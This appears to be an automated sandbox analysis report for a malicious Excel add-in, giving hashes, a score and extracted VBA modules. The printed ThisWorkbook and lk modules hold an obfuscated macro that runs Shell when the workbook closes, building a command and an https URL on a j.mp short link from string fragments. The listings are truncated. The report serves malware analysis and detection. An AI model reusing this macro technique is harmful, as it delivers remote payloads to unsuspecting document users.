General

  • Target

    a938f9f04b2c8438690c81fe6de0e116_JaffaCakes118

  • Size

    15KB

  • MD5

    a938f9f04b2c8438690c81fe6de0e116

  • SHA1

    6f372078a4a3cadf2b7bb66442bc7c813d87120a

  • SHA256

    c7e40c5bb07a38e5d072cc4f4fc3eef3b1ebd6e7ed10da6edc637941ca9e5ae3

  • SHA512

    8eaf29c49f1cc33a0a4b9d7218738330dde66c8939ebfba2911c91ebcd1859c31e700b548afda8784cf83d970d13bdbeffd49332501c4e8afc60c60772121475

  • SSDEEP

    384:/br9XuasFux/FltDBIxcoucbF9OCqQd5rgNSTH:fpuasFupjDGcoucbbOCXdxgNSTH

Score
8/10

Malware Config

Signatures

  • Suspicious Office macro 1 IoCs

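    Office document equipped with macros. In this sample the ThisWorkbook module calls Shell from Workbook_BeforeClose, so the command runs when the workbook is closed; the command string is the concatenation of tomala (module m) and kokdasodk (module lk), each assembled from short string fragments. The fragments visible in lk concatenate to an https URL in which the text before "@" is URL userinfo and the host is j.mp. The listings shown here are truncated, so the value tomala returns is not visible.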

Files

  • a938f9f04b2c8438690c81fe6de0e116_JaffaCakes118
    .xlam office2007

    m

    Attribute VB_Name = "m"
    Function tomala() As String
    lora = "h"
    myralun = lora
    pupu = myralun
    agonlove = "s"
    agonlovefailed = agonlove
    pin = "m"
    topalota = pin
    golopu = topalota

    ThisWorkbook

    Attribute VB_Name = "ThisWorkbook"
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Shell tomala + kokdasodk

    Sheet1

    Attribute VB_Name = "Sheet1"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True

    Sheet2

    Attribute VB_Name = "Sheet2"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True

    Sheet3

    Attribute VB_Name = "Sheet3"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True

    lk

    Attribute VB_Name = "lk"
    Function kokdasodk() As String
    hotguase = "t"
    polaotos = "p"
    poloots = "h"
    koasmxjw = "s:/"
    kdjkeurg = "/%909123id%909123id%909123id%909123id%909123id@j.mp\kasdasdasasdasddskdd"
    zuoosaod = poloots + hotguase + hotguase + polaotos + koasmxjw + kdjkeurg
    koasdllo = zuoosaod
    kokdasodk = koasdllo
